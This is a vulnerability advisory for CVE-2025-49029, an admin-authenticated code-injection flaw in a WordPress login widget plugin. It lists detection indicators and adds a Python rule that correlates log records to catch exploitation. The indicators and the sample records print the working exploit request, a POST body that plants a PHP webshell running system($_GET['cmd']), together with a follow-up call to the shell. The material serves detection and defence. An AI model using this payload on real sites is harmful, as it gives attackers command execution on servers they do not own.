CVE-2025-49029
published 2025-07-01

CVE-2025-49029: Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.kazi Custom Login And Signup Widget custom-login-and-signup-widget allows Code…

Priority: P2 (60) · Severity: critical · CVSS 3.1 base score: 9.1
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Exploit: available
EPSS: 2.12% (79.6th percentile)
Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.kazi Custom Login And Signup Widget (custom-login-and-signup-widget) allows Code Injection. This issue affects Custom Login And Signup Widget: from n/a through 1.0 (all versions up to and including 1.0).

Affected (1 range)

Vendor: bitto.kazi
Product: custom_login_and_signup_widget
Version range: <= 1.0
Fixed in: (none listed)

Detection & IOCs

url: /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes
path: /wp-content/plugins/custom-login-and-signup-widget/content/sn.php
filename: sn.php
command (POST body, URL-encoded): text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit
  decoded: text=<?php if(isset($_GET['cmd'])) system($_GET['cmd']); ?>&submit=Submit
  • Detect exploitation attempts by monitoring POST requests to the plugin settings page (options-general.php?page=custom-login-and-signup-widget) whose `text` parameter contains a PHP webshell payload; note that POST bodies are only visible if a WAF, reverse proxy or audit log records request bodies, since a standard access log does not.
  • Monitor for GET requests to the dropped webshell at /wp-content/plugins/custom-login-and-signup-widget/content/sn.php, especially when a `cmd` query parameter is present.
  • A successful exploitation results in an HTTP 500 response from the dropped sn.php file; correlate it with a prior POST to the settings page from the same source that carried PHP code in the `text` field.
  • Use a publicwww/FOFA fingerprint for the plugin to identify exposed instances still running an affected version.
  • The attack requires authentication as an administrator; look for an admin login followed immediately by a POST to the plugin settings page with PHP code in the body.
  • Exploitation requires administrator-level authentication; unauthenticated exploitation is not possible with this CVE.
  • Affected versions are Custom Login And Signup Widget from n/a through 1.0 only.
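The two-step chain above (PHP dropped via the settings page, then the webshell called) can be turned into a correlation rule. The following is an added example written for this page, not code from the advisory or the plugin: it runs over constructed request records of the kind a WAF or body-logging proxy would emit (the IPs, timestamps and status codes are invented, and the assumption that request bodies are available is stated in the code), flags each step, and raises the severity when a hit on sn.php follows a PHP-bearing settings POST from the same source.

```python
"""Correlation rule for the CVE-2025-49029 exploitation chain.

Added example, not from the original page. Assumes request records that
include the POST body (WAF / audit log / body-logging proxy); a plain
access log would only let you run the second check (hits on sn.php).
"""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

SETTINGS_PAGE = "/wp-admin/options-general.php"
PLUGIN_SLUG = "custom-login-and-signup-widget"
WEBSHELL_PATH = "/wp-content/plugins/custom-login-and-signup-widget/content/sn.php"
PHP_MARKERS = ("<?php", "<?=")

# Constructed sample records (hypothetical sources, timestamps and statuses).
SAMPLE_RECORDS = [
    {"ts": 100, "src": "203.0.113.7", "method": "POST", "status": 200,
     "url": "/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes",
     "body": "text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system"
             "%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit"},
    {"ts": 103, "src": "203.0.113.7", "method": "GET", "status": 500,
     "url": "/wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=id",
     "body": ""},
    {"ts": 200, "src": "198.51.100.9", "method": "POST", "status": 200,
     "url": "/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes",
     "body": "text=Welcome+back%21&submit=Submit"},          # benign settings save
    {"ts": 300, "src": "198.51.100.42", "method": "GET", "status": 404,
     "url": "/wp-content/plugins/custom-login-and-signup-widget/content/sn.php",
     "body": ""},                                            # scanner probing the path
]


def is_settings_post_with_php(rec):
    """Step 1: POST to the plugin settings page whose `text` field carries PHP."""
    if rec["method"] != "POST":
        return False
    parts = urlsplit(rec["url"])
    if parts.path != SETTINGS_PAGE:
        return False
    if parse_qs(parts.query).get("page", [""])[0] != PLUGIN_SLUG:
        return False
    # parse_qs URL-decodes the body, so the check sees the literal "<?php".
    text = parse_qs(rec["body"]).get("text", [""])[0].lower()
    return any(marker in text for marker in PHP_MARKERS)


def is_webshell_request(rec):
    """Step 2: any hit on the dropped sn.php; a `cmd` parameter raises severity."""
    parts = urlsplit(rec["url"])
    if parts.path != WEBSHELL_PATH:
        return None
    return "high" if "cmd" in parse_qs(parts.query) else "medium"


def detect(records, window=3600):
    """Return (severity, src, ts, reason) findings in time order.

    A webshell hit is escalated to "critical" when the same source sent a
    PHP-bearing settings POST within `window` seconds before it.
    """
    findings = []
    drops = defaultdict(list)  # src -> timestamps of PHP-bearing settings POSTs
    for rec in sorted(records, key=lambda r: r["ts"]):
        if is_settings_post_with_php(rec):
            drops[rec["src"]].append(rec["ts"])
            findings.append(("high", rec["src"], rec["ts"],
                             "PHP code in `text` field of plugin settings POST"))
            continue
        sev = is_webshell_request(rec)
        if sev is None:
            continue
        prior = [t for t in drops[rec["src"]] if 0 <= rec["ts"] - t <= window]
        if prior:
            sev = "critical"
            reason = (f"sn.php hit {rec['ts'] - prior[-1]}s after webshell drop "
                      f"(status {rec['status']})")
        else:
            reason = f"request to dropped webshell path (status {rec['status']})"
        findings.append((sev, rec["src"], rec["ts"], reason))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_RECORDS):
        print(*finding)
```

The benign settings save is not flagged, the bare probe of sn.php is reported at medium severity because the file should never exist, and the source that dropped PHP and then called sn.php with `cmd` is escalated to critical; the advisory's note that a successful exploitation answered with HTTP 500 is carried in the reason text rather than used as a filter, so a webshell that happens to return 200 is still caught.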